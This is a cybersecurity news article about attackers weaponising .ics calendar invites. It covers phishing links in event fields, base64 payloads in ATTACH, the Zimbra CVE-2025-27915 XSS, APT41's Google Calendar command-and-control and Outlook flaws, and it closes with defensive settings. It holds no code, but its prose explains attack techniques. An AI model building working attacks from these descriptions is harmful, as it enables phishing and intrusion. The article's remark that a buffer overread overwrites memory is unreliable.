Hackers Weaponizing Calendar Files as New Attack Vector Bypassing Traditional Email Defenses

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

A surge in attacks exploiting iCalendar (.ics) files as a sophisticated threat vector that bypasses traditional email security defenses. These attacks leverage the trusted, plain-text nature of calendar invitations to deliver credential phishing campaigns, malware payloads, and zero-day exploits.

Over the past year, calendar-based phishing has emerged as the third most common email social engineering vector, with a 59% bypass rate against Secure Email Gateways (SEGs) and affecting hundreds of organizations worldwide through campaigns delivering thousands of malicious invites.

The iCalendar format, standardized under RFC 5545, was designed as a text-based, universally interoperable standard for exchanging calendar and scheduling information across platforms, including Microsoft Outlook, Google Calendar, and Apple iCal.

This simplicity, while enabling seamless integration, creates exploitable attack surfaces that security solutions struggle to monitor effectively.

The format consists of structured components beginning with VCALENDAR containers that encapsulate VEVENT entries, each containing properties such as DTSTART, DTEND, SUMMARY, LOCATION, DESCRIPTION, and ATTACH.

Attackers exploit multiple fields within .ics files to embed malicious content. The DESCRIPTION and LOCATION fields can contain clickable URLs that redirect victims to credential phishing pages masquerading as legitimate login portals.

The ATTACH property supports both URI references and base64-encoded binary content, allowing attackers to embed malware payloads directly within the calendar file itself.

Security researchers at NCC Group demonstrated that files referenced by URI in ATTACH properties are automatically embedded when calendar invites are exported or forwarded, enabling silent data exfiltration from victim systems.

These base64-encoded attachments can include executable files, malicious scripts, or DLL components that execute without triggering traditional antivirus detection.

The ORGANIZER and ATTENDEE fields enable sophisticated social engineering through sender spoofing, where attackers forge identities of trusted contacts or authority figures to increase legitimacy.

Calendar applications process these fields to display sender information, and because invites often originate from legitimate calendar services like Google Calendar or Microsoft Exchange servers, they pass SPF, DKIM, and DMARC authentication checks that would normally flag spoofed emails.

Why Traditional Security Defenses Fail Against Calendar Files

Security tooling has historically focused on attachments that execute code or contain macros, treating .ics files as benign text documents that pose minimal risk.

Most email gateways and endpoint filters lack deep inspection capabilities for calendar files, failing to parse BEGIN:VCALENDAR content or examine embedded URLs and base64-encoded data within ATTACH fields.

This creates a critical security gap that attackers actively exploit, with calendar files slipping through filters designed to catch executables, Office documents with macros, and archive files.

The automatic processing mechanisms built into calendar applications compound this vulnerability. In certain configurations, Microsoft Outlook and Google Calendar automatically process .ics attachments and create tentative calendar events even if users never open the originating email or if the email is quarantined by security solutions.

This “invisible click” problem means malicious links become integrated into users’ trusted calendar interfaces, appearing as legitimate business events rather than suspicious emails.

When calendar reminders trigger hours or days later, users perceive them as part of their normal workflow rather than potential security threats, dramatically increasing click-through rates compared to traditional phishing emails.

Research by Cymulate revealed that calendar files with malicious attachments achieved penetration rates of 59% and 68% against SEGs, significantly higher than most other attack vectors.

This effectiveness stems from several factors: .ics files use the MIME type “text/calendar” which security filters classify as low-risk; their plain-text structure makes them appear harmless during automated scanning; and the volume of legitimate calendar invites flowing through enterprise environments makes anomaly detection challenging.

Furthermore, Sublime Security researchers discovered that calendar entries often persist even when email security solutions successfully quarantine the originating message, creating a dual-payload delivery mechanism where both the email and calendar event must be addressed for complete remediation.

This persistence gives attackers two opportunities for successful compromise and extends the attack window beyond the initial email delivery.

Real-World Attack Campaigns and Exploitation in the Wild

Zimbra Zero-Day Exploitation (CVE-2025-27915)

The most sophisticated calendar file exploitation emerged in early 2025 when threat actors weaponized a zero-day vulnerability in Zimbra Collaboration Suite affecting versions 9.0 through 10.1.

Tracked as CVE-2025-27915, this stored cross-site scripting (XSS) flaw stemmed from insufficient HTML sanitization in .ics file parsing, specifically exploiting the <details ontoggle> HTML event to execute arbitrary JavaScript when victims opened malicious calendar invitations.

StrikeReady researchers discovered the attacks while monitoring for .ics files larger than 10KB containing embedded JavaScript code. The campaign, detected in January 2025 before Zimbra’s patch release on January 27, targeted Brazilian military organizations through emails spoofing the Libyan Navy’s Office of Protocol.

The malicious .ics files contained 100KB JavaScript payloads obfuscated using base64 encoding, designed to execute within victims’ browser sessions and perform comprehensive data theft operations.

The malware implemented sophisticated evasion techniques, including a 60-second execution delay, a three-day execution gate ensuring it only ran if at least three days had passed since the last execution, and UI element hiding to reduce visual detection clues.

Once activated, the malicious code created hidden username and password fields to steal credentials from login forms, monitored user activity through mouse and keyboard tracking, and logged out inactive users to trigger credential theft.

The payload utilized Zimbra’s SOAP API to search folders and retrieve emails, exfiltrating content to the command-and-control domain ffrk.net every four hours.

It established persistence by creating a mail filter named “Correo” that forwarded all messages to attacker-controlled Proton addresses, and collected authentication artifacts, including two-factor authentication scratch codes, trusted device tokens, and app-specific passwords.

CISA added CVE-2025-27915 to its Known Exploited Vulnerabilities catalog following confirmation of active exploitation against government entities. Security researchers noted TTPs similar to those attributed to UNC1151, a Belarusian state-sponsored threat group known for targeting government and military organizations through webmail exploitation.

Google Calendar Spoofing Campaign

Check Point researchers identified a massive phishing campaign that leveraged Google Calendar’s trusted infrastructure to deliver over 4,000 spoofed calendar invites to approximately 300 organizations within a four-week period.

Attackers manipulated email headers to make invitations appear as if they were sent via Google Calendar on behalf of known, legitimate individuals, successfully bypassing spam filters by passing DKIM, SPF, and DMARC security checks.

The campaign initially exploited Google Calendar features that linked to Google Forms, but evolved when security products began flagging these invitations, with attackers pivoting to Google Drawings to maintain effectiveness.

The attack chain embedded calendar files (.ics) or links leading to fake support pages disguised as cryptocurrency mining or Bitcoin support sites.

Users who interacted with these invites encountered fake reCAPTCHA verification pages or support buttons that ultimately redirected them to credential phishing pages designed to harvest login credentials, payment details, and personal information.

The financial motivation behind these attacks enabled cybercriminals to engage in credit card fraud, unauthorized transactions, and security measures bypasses across multiple accounts using stolen data.

Cofense researchers documented a related campaign where attackers exploited .ics calendar invites sent from compromised school district email accounts, containing links to documents hosted on Microsoft SharePoint that led to Wells Fargo phishing pages requesting sensitive banking information, including login credentials, PINs, and account numbers.

Google Threat Intelligence Group discovered in late October 2024 that Chinese state-sponsored threat actor APT41 deployed malware hosted on a compromised government website to target multiple government entities using an innovative command-and-control mechanism through Google Calendar.

The campaign delivered spear-phishing emails containing links to ZIP archives that included a Windows shortcut (LNK) file disguised as a PDF document alongside seven image files, two of which were actually encrypted malware payloads.

When victims executed the LNK file, it displayed a decoy PDF claiming that the listed species required an export declaration while silently initiating a three-stage infection chain.

The PLUSDROP component decrypted the malicious payload using XOR-based routines and executed it via Rundll32.exe; PLUSINJECT employed process hollowing to inject code into legitimate svchost.exe processes for evasion; and TOUGHPROGRESS established the primary backdoor with Google Calendar C2 capabilities.

The malware’s distinctive feature was its abuse of Google Calendar for command-and-control operations, creating zero-minute events at hard-coded dates (May 30, 2023) with encrypted exfiltrated data embedded in event descriptions.

Attackers placed encrypted commands in Calendar events dated July 30 and 31, 2023, which the malware polled, decrypted, and executed on compromised Windows hosts before writing results back to new Calendar events for attacker retrieval.

This technique allowed APT41 to blend malicious C2 traffic with legitimate cloud service activity, evading traditional network-based detection mechanisms.

Google implemented custom detection fingerprints to identify and disable malicious calendar instances, terminated attacker-controlled Workspace projects, and added harmful domains to Safe Browsing blocklists.

The campaign demonstrated the convergence of state-sponsored cyber-espionage with cloud service abuse, highlighting how trusted platforms can be weaponized for persistent access and data exfiltration.

Microsoft Outlook DDE Vulnerability Exploitation

Dynamic Data Exchange (DDE) protocol vulnerabilities in Microsoft Outlook created additional attack surfaces for calendar-based exploits prior to security updates.

Researchers discovered that attackers could embed malicious DDE code within calendar invitation bodies, enabling phishing scams without traditional file attachments.

When victims opened these calendar invites, specially crafted DDE fields triggered code execution that could launch arbitrary commands or download malware, though users received two dialog boxes requesting permission before execution occurred.

Security firm SentinelOne demonstrated how easy it was to exploit DDE in calendar invites, showing that attackers could use social engineering to convince users that clicking “Yes” on the prompts was necessary to view the invitation properly.

Microsoft addressed the most critical Outlook vulnerability tracked as CVE-2023-35636 in December 2023, which could leak NTLM v2 hashed passwords through malicious calendar invites with a single click when processing specially crafted .ics files.

Threat actors infused malicious headers into .ics files that forced remote code execution, sending hashed passwords to attacker-controlled systems where offline brute-force or relay attacks could compromise accounts.

A subsequent vulnerability in Microsoft Outlook discovered in 2025 (CVE-2025-32705) enabled remote code execution through improper memory handling when parsing specially crafted email content or calendar invitations.

This buffer overread vulnerability allowed attackers to manipulate Content-Length headers or embed oversized ICS file elements to overwrite adjacent memory regions, executing shellcode in the context of logged-in users.

The exploit particularly threatened enterprises using Outlook for calendaring and task management, where automatic preview features could trigger the flaw without explicit file opens.

Detection, Mitigation, and Defensive Strategies

Organizations must treat .ics files as active content requiring the same scrutiny as executables or scripts. Email security solutions should be configured to deeply inspect calendar files for embedded URLs, base64-encoded data, ATTACH fields, and HTML content.

Sublime Security developed specialized ICS phishing functionality that automatically removes malicious calendar invites from calendars during message remediation, addressing the persistence problem where entries remain after email quarantine.

This capability deletes corresponding events from calendars when messages are sent to quarantine, spam, or trash, preventing the dual-payload delivery mechanism.

Calendar client default settings require modification to prevent automatic event creation from external sources. For Google Workspace, administrators should navigate to Apps → Google Workspace → Calendar → Advanced settings and set “Add invitations to my calendar” to either “Invitations from known senders” or “Invitations users have responded to via email”.

In Microsoft 365 environments, PowerShell commands should set AutomateProcessing to None, disabling the Calendar Attendant from automatically processing invites. Exchange Online administrators can configure quarantine rules for emails containing .ics files from external senders, and Group Policy settings should disable automatic preview panes.

Microsoft Teams calendar invites present similar risks, with attackers weaponizing invites to deliver malicious content directly onto calendars even when Microsoft Defender quarantines the original email.

Organizations should disable the AllowAnonymousUsersToJoinMeeting setting where possible, implement Microsoft Teams Meeting Policies to restrict auto-join behavior and external invites, and leverage brand impersonation protection and phishing alerts being rolled out for Teams.

The weaponization of calendar files represents a significant evolution in cyber threat tactics that exploits fundamental trust assumptions built into enterprise collaboration platforms.

With a 59% bypass rate against traditional Secure Email Gateways and campaigns affecting hundreds of organizations globally, .ics file attacks demand immediate defensive attention from security teams.

The technical sophistication demonstrated in zero-day exploits like Zimbra CVE-2025-27915, combined with state-sponsored groups like APT41 innovating C2 mechanisms through Google Calendar, illustrates how attackers continuously adapt to security improvements.

Organizations must recognize that calendar invitations can no longer be treated as benign scheduling communications but rather as potential attack vectors requiring rigorous security controls. The convergence of automatic processing mechanisms, social engineering effectiveness, and security tool blind spots creates ideal conditions for attacker success.

Comprehensive defense requires layered approaches combining technical controls such as CDR and deep packet inspection, configuration hardening to disable automatic event creation, behavioral monitoring for anomalous calendar activity, and sustained user awareness training emphasizing verification protocols.

As threat actors continue refining calendar-based attack techniques and expanding their integration with broader compromise campaigns, the security community must prioritize this vector in threat modeling and defense architecture planning. ​

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.